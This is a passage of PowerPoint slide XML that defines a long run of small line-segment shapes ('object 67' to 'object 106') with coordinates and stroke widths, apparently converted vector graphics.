            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="276"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="276"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="object 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1519245" y="5689672"/>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68" name="object 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1519244" y="5689673"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="object 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547098" y="5689414"/>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70" name="object 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547096" y="5689126"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="276"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="276"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="object 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1575003" y="5689672"/>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72" name="object 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1575002" y="5689673"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="object 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1602909" y="5689672"/>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74" name="object 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1602908" y="5689673"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="object 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1630763" y="5689414"/>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76" name="object 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1630762" y="5689126"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="276"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="276"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="object 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1658668" y="5689672"/>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78" name="object 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1658667" y="5689673"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="object 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1686027" y="5689672"/>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80" name="object 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1686026" y="5689673"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="object 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1713879" y="5689672"/>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82" name="object 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1713878" y="5689673"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="object 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1741787" y="5689672"/>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84" name="object 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1741786" y="5689673"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="object 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1769639" y="5689141"/>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86" name="object 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1769638" y="5688578"/>
            <a:ext cx="0" cy="2517"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1269">
                <a:moveTo>
                  <a:pt x="-2706" y="414"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="414"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="object 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1797545" y="5689141"/>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88" name="object 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1797543" y="5688578"/>
            <a:ext cx="0" cy="2517"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1269">
                <a:moveTo>
                  <a:pt x="-2706" y="414"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="414"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="object 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1825452" y="5686733"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3507">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="object 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1825451" y="5683763"/>
            <a:ext cx="0" cy="7550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3810">
                <a:moveTo>
                  <a:pt x="-2706" y="1629"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1629"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="object 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1853304" y="5687799"/>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92" name="object 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1853303" y="5685897"/>
            <a:ext cx="0" cy="5033"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="2539">
                <a:moveTo>
                  <a:pt x="-2706" y="1090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1090"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="object 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1881210" y="5686733"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3507">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="object 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1881209" y="5683763"/>
            <a:ext cx="0" cy="7550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3810">
                <a:moveTo>
                  <a:pt x="-2706" y="1629"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1629"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="object 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1909062" y="5685118"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5136">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="object 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1909061" y="5680532"/>
            <a:ext cx="0" cy="10067"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="5080">
                <a:moveTo>
                  <a:pt x="-2706" y="2443"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="2443"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4887">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="object 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1936970" y="5686991"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="object 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1936968" y="5684310"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1491"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1491"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="object 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1964875" y="5687264"/>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100" name="object 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1964874" y="5684855"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1353"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1353"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="object 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1992180" y="5687264"/>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102" name="object 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1992179" y="5684855"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1353"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1353"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="object 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2020086" y="5688073"/>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104" name="object 104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2020085" y="5686445"/>
            <a:ext cx="0" cy="3775"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1905">
                <a:moveTo>
                  <a:pt x="-2706" y="952"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="952"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="object 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2047994" y="5686460"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3783">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="object 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2047992" y="5683214"/>
            <a:ext cx="0" cy="7550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3810">
                <a:moveTo>
                  <a:pt x="-2706" y="1767"/>
                </a:moveTo>
                <a:lnTo>
